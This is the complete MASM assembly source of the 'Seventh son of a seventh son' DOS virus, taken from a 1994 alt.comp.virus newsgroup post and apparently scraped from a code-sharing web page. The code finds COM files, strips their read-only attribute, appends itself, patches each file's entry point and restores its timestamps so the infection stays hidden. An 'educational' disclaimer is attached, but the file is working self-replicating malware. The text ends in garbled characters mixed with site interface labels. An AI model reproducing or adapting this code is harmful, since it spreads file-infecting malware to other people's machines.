📄 7son.asm
字号:
From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994Xref: netcom.com alt.comp.virus:506Path: netcom.com!ix.netcom.com!netnewsFrom: Zeppelin@ix.netcom.com (Mr. G)Newsgroups: alt.comp.virusSubject: 7th Son VirusDate: 29 Nov 1994 13:02:59 GMTOrganization: NetcomLines: 236Distribution: worldMessage-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com>References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>NNTP-Posting-Host: ix-pas2-10.ix.netcom.com;****************************************************************************;* Seventh son of a seventh son version 4;*;* Compile with MASM 4.0;* (other assemblers will probably not produce the same result);*;* Disclaimer:;* This file is only for educational purposes. The author takes no;* responsibility for anything anyone does with this file. Do not;* modify this file!;****************************************************************************cseg segment assume cs:cseg,ds:cseg,es:cseg,ss:cseg .RADIX 16FILELEN equ end - startMINTARGET equ 1000dMAXTARGET equ -(FILELEN+40);****************************************************************************;* Dummy program (infected);**************************************************************************** org 100begin: db 4Dh ;virus mark db 0E9h, 4, 0 ;jump to virus entry;****************************************************************************;* Begin of the virus;****************************************************************************start: db 0CDh, 20h, 0, 0 cld mov si,0100h push si ;push new IP on stack mov di,si add si,[si+2] ;si -> start push si ;restore original begin movsw movsw pop si mov ax,3300h ;get ctrl-break flag int 21 push dx cwd ;clear the flag inc ax push ax int 21 mov ax,3524h ;get int24 vector int 21 push bx push es lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector mov ah,25h push ax int 21 mov ah,2Fh ;get DTA adres int 21 push es push bx add dx,070h ;set new DTA adres mov ah,1Ah int 21 add dx,1Eh push dx lea di,[si+(offset generation-0104)] ;check generation cmp [di],0707h jne verder lea dx,[di+2] ;7th son of a 7th son! mov ah,09h int 21verder: mov ax,[di] ;update generations xchg ah,al mov al,1 mov [di],ax lea dx,[di+33d] ;find first COM-file xor cx,cx mov ah,4Ehinfloop: int 21 pop dx jc stop push dx xor cx,cx ;clear read-only-arttribute mov ax,4301 int 21 jc return1 mov ax,3D02h ;open the file int 21 jc return1 xchg bx,ax mov ax,5700h ;get file date & time int 21 push cx push dx mov cx,4 ;read begin of file mov dx,si mov ah,3fh int 21 cmp byte ptr [si],4Dh ;already infected or an EXE? je return2 cmp byte ptr [si],5Ah ;or a weird EXE? je return2 mov al,2 ;go to end of file call seek cmp ax,MAXTARGET ;check length of file jnb return2 cmp ax,MINTARGET jbe return2 push ax mov cx,FILELEN ;write program to end of file mov ah,40h int 21 cmp ax,cx ;are all bytes written? pop ax jnz return2 xchg ax,bp mov al,0 ;go to begin of file call seek mov word ptr [si],0E94Dh ;write mark and jump-command mov word ptr [si+2],bp mov ah,40h int 21 inc byte ptr [di] ;number of next sonreturn2: pop dx ;restore file date & time pop cx mov ax,5701h int 21 mov ah,3Eh ;close the file int 21return1: mov ah,4Fh ;find next file jmp short infloopstop: pop dx ;restore DTA adres pop ds mov ah,1Ah int 21 pop ax ;restore int24 vector pop ds pop dx int 21 pop ax ;restore ctrl-break flag pop dx int 21 push cs push cs pop ds pop es retseek: mov ah,42 cwdint21: xor cx,cx int 21 mov cl,4 mov dx,si ret;****************************************************************************;* Interupt handler 24;****************************************************************************ni24: mov al,03 iret;****************************************************************************;* Data;****************************************************************************generation db 1,1sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'filename db '*.COM',0 db '偍俺⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -